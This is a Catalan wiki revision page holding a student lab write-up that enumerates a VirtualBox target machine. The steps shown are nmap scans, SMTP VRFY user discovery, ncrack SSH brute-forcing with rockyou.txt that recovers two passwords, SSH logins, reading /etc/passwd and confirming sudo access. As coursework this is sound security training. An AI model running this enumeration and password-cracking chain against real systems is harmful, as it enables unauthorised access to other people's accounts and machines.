Diferència entre revisions de la pàgina «ASIX/M16/UF2/EX3/3»

De Lordwektabyte Wiki
Salta a la navegació Salta a la cerca
(Es crea la pàgina amb «==Anàlisi general== Primer de tot, podem executar un <code>nmap</code> a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina...».)
 
m (Guillem ha mogut M16/UF2/EX3/3 a ASIX/M16/UF2/EX3/3 sense deixar una redirecció: Crear subnivell ASIX)
 
(Hi ha 2 revisions intermèdies del mateix usuari que no es mostren)
Línia 1: Línia 1:
==Anàlisi general==
 
 
Primer de tot, podem executar un <code>nmap</code> a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem
 
Primer de tot, podem executar un <code>nmap</code> a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem
 
<source>
 
<source>
Línia 52: Línia 51:
  
 
Deduïm que la màquina d'enumeració és la que es troba a <code>10.16.2.9</code> ja que la resta no tenen serveis publicats o bé és el Kali mateix,
 
Deduïm que la màquina d'enumeració és la que es troba a <code>10.16.2.9</code> ja que la resta no tenen serveis publicats o bé és el Kali mateix,
 
==Anàlisi acotat==
 
Una vegada fet això, podem executar <code>nmap</code> de nou contra aquella màquina concreta per a llistar en detall els serveis que s'hi estan executant
 
<source>
 
root@kali-gsb:~# nmap 10.16.2.9 -sV
 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 12:22 CET
 
Nmap scan report for 10.16.2.9
 
Host is up (0.00036s latency).
 
Not shown: 992 closed ports
 
PORT    STATE SERVICE    VERSION
 
22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 
25/tcp  open  smtp      Postfix smtpd
 
53/tcp  open  domain    ISC BIND 9.11.3-1ubuntu1.5 (Ubuntu Linux)
 
110/tcp open  pop3      Dovecot pop3d
 
143/tcp open  imap      Dovecot imapd (Ubuntu)
 
389/tcp open  ldap      OpenLDAP 2.2.X - 2.3.X
 
993/tcp open  ssl/imaps?
 
995/tcp open  ssl/pop3s?
 
MAC Address: 08:00:27:DB:66:F2 (Oracle VirtualBox virtual NIC)
 
Service Info: Host:  enum.iescarlesvallbona.cat; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 
Nmap done: 1 IP address (1 host up) scanned in 15.84 seconds
 
</source>
 
 
==Anàlisi de serveis==
 
===SMTP===
 
Veiem que hi ha obert un servidor SMTP. Segons apunts de la UF, podem provar si la comanda <code>VRFY <usuari></code> es permet i podem extreure algun usuari relacionat amb l'organització des d'on s'ha extret aquesta màquina (Institut Carles Vallbona)
 
<source>
 
root@kali-gsb:~# telnet 10.16.2.9 25
 
Trying 10.16.2.9...
 
Connected to 10.16.2.9.
 
Escape character is '^]'.
 
220 enum.iescarlesvallbona.cat ESMTP Postfix (Ubuntu)
 
VRFY roger
 
252 2.0.0 roger
 
VRFY pau
 
252 2.0.0 pau
 
VRFY julian
 
252 2.0.0 julian
 
VRFY jaume
 
252 2.0.0 jaume
 
VRFY guillem
 
550 5.1.1 <guillem>: Recipient address rejected: User unknown in local recipient table
 
</source>
 
 
Veiem, manualment, que aquests usuaris existeixen excepte ''guillem''. Això ens pot ser suficient per a provar d'extreure contrasenyes dels usuaris mitjançant força bruta a través del servei SSH per exemple.
 
 
Una altra opció seria utilitzar ''scripts'' o mòduls de NMap per a passar-li llistes d'usuaris i que ens retorni si existeixen al sistema o no.
 
 
===SSH===
 
Amb <code>ncrack</code> provarem d'accedir per SSH amb algun usuari que tingui una contrasenya feble o vulnerable present al ''wordlist'' de Kali ''rockyou.txt''
 
<source>
 
root@kali-gsb:~# ncrack -p 22 -user roger -P /usr/share/wordlists/rockyou.txt 10.16.2.9
 
 
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-17 12:30 CET
 
 
Discovered credentials for ssh on 10.16.2.9 22/tcp:
 
10.16.2.9 22/tcp ssh: 'roger' 'whatever'
 
 
Ncrack done: 1 service scanned in 3.00 seconds.
 
 
Ncrack finished.
 
</source>
 
 
Hem trobat que l'usuari ''roger'' té la contrasenya ''whatever''.
 
 
El següent pas serà accedir per SSH amb aquestes credencials i mirar si tenim permisos per llegir l'arxiu <code>/etc/passwd</code> i poder així, llistar la resta d'usuaris del sistema en la seva totalitat.
 
<source>
 
root@kali-gsb:~# ssh roger@10.16.2.9
 
roger@10.16.2.9's password:
 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)
 
 
* Documentation:  https://help.ubuntu.com
 
* Management:    https://landscape.canonical.com
 
* Support:        https://ubuntu.com/advantage
 
 
  System information as of Sun Mar 17 11:32:39 UTC 2019
 
 
  System load:  0.0              Processes:            98
 
  Usage of /:  44.7% of 9.78GB  Users logged in:      0
 
  Memory usage: 4%                IP address for enp0s3: 10.16.2.9
 
  Swap usage:  0%
 
 
 
118 packages can be updated.
 
0 updates are security updates.
 
 
 
Last login: Sun Mar 17 11:30:24 2019 from 10.16.2.11
 
roger@enum:~$ cat /etc/passwd
 
root:x:0:0:root:/root:/bin/bash
 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 
bin:x:2:2:bin:/bin:/usr/sbin/nologin
 
sys:x:3:3:sys:/dev:/usr/sbin/nologin
 
sync:x:4:65534:sync:/bin:/bin/sync
 
games:x:5:60:games:/usr/games:/usr/sbin/nologin
 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
 
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
 
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
 
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
 
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
 
lxd:x:105:65534::/var/lib/lxd/:/bin/false
 
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
 
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
 
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
 
pollinate:x:109:1::/var/cache/pollinate:/bin/false
 
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
 
enum:x:1000:1000:enum:/home/enum:/bin/bash
 
julian:x:1001:1001:,,,:/home/julian:/bin/bash
 
pau:x:1002:1002:,,,:/home/pau:/bin/bash
 
jaume:x:1003:1003:,,,:/home/jaume:/bin/bash
 
xavi:x:1004:1004:,,,:/home/xavi:/bin/bash
 
roger:x:1005:1005:,,,:/home/roger:/bin/bash
 
bind:x:111:113::/var/cache/bind:/usr/sbin/nologin
 
Debian-snmp:x:112:114::/var/lib/snmp:/bin/false
 
postfix:x:113:116::/var/spool/postfix:/usr/sbin/nologin
 
dovecot:x:114:118:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
 
dovenull:x:115:119:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
 
openldap:x:116:120:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
 
</source>
 
 
També podem provar si aquest usuari té permisos de ''sudo'':
 
<source>
 
roger@enum:~$ sudo nano /etc/passwd
 
[sudo] password for roger:
 
roger is not in the sudoers file.  This incident will be reported.
 
</source>
 
 
L'usuari ''roger'' no està a <code>sudoers</code>, però al veure que es tracta d'un Ubuntu, podem deduir que l'usuari amb UID=1000 tindrà permisos de ''sudo''. Segons l'arxiu d'usuaris, aquest usuari correspon a ''enum'':
 
<source>
 
enum:x:1000:1000:enum:/home/enum:/bin/bash
 
</source>
 
 
Per tant, el següent pas, serà executar <code>ncrack</code> de nou amb l'usuari ''enum'' per veure si la contrasenya és present en aquell wordlist
 
<source>
 
root@kali-gsb:~# ncrack -p 22 -user enum -P /usr/share/wordlists/rockyou.txt 10.16.2.9
 
 
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-17 12:30 CET
 
 
Discovered credentials for ssh on 10.16.2.9 22/tcp:
 
10.16.2.9 22/tcp ssh: 'enum' 'trustno1'
 
 
Ncrack done: 1 service scanned in 3.00 seconds.
 
 
Ncrack finished.
 
</source>
 
 
Accedirem per SSH amb la contrasenya que hem extret
 
<source>
 
root@kali-gsb:~# ssh enum@10.16.2.9
 
enum@10.16.2.9's password:
 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)
 
 
* Documentation:  https://help.ubuntu.com
 
* Management:    https://landscape.canonical.com
 
* Support:        https://ubuntu.com/advantage
 
 
  System information as of Sun Mar 17 12:38:49 UTC 2019
 
 
  System load:  0.31              Processes:            98
 
  Usage of /:  45.5% of 9.78GB  Users logged in:      0
 
  Memory usage: 4%                IP address for enp0s3: 10.16.2.9
 
  Swap usage:  0%
 
 
 
118 packages can be updated.
 
0 updates are security updates.
 
 
 
Last login: Wed Feb 20 16:38:32 2019 from 10.16.2.8
 
</source>
 
 
Aleshores farem la mateixa prova que amb l'altre usuari: executar una comanda amb ''sudo'' per veure si podem fer un moviment vertical i arribar a poder administrar el sistema o modificar arxius dins del ''home'' de l'usuari ''root'':
 
<source>
 
sudo nano /root/prova.enum
 
</source>
 
 
Veiem que se'ns dóna permís.
 

Revisió de 11:33, 15 abr 2020

Primer de tot, podem executar un nmap a tota la xarxa de VirtualBox per a detectar quina adreça IP ha sigut assignada a la màquina que analitzarem 

root@kali-gsb:~# nmap 10.16.2.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 12:21 CET
Nmap scan report for 10.16.2.1
Host is up (0.00038s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)

Nmap scan report for 10.16.2.2
Host is up (0.00064s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
631/tcp  open  ipp
3306/tcp open  mysql
8010/tcp open  xmpp
8888/tcp open  sun-answerbook
MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)

Nmap scan report for 10.16.2.3
Host is up (0.00043s latency).
All 1000 scanned ports on 10.16.2.3 are filtered
MAC Address: 08:00:27:1D:7B:F3 (Oracle VirtualBox virtual NIC)

Nmap scan report for 10.16.2.9
Host is up (0.00038s latency).
Not shown: 992 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
53/tcp  open  domain
110/tcp open  pop3
143/tcp open  imap
389/tcp open  ldap
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: 08:00:27:DB:66:F2 (Oracle VirtualBox virtual NIC)

Nmap scan report for 10.16.2.11
Host is up (0.0000060s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.38 seconds

Deduïm que la màquina d'enumeració és la que es troba a 10.16.2.9 ja que la resta no tenen serveis publicats o bé és el Kali mateix,

Obtingut de «http://wiki.lordwektabyte.cat/index.php?title=ASIX/M16/UF2/EX3/3&oldid=5188»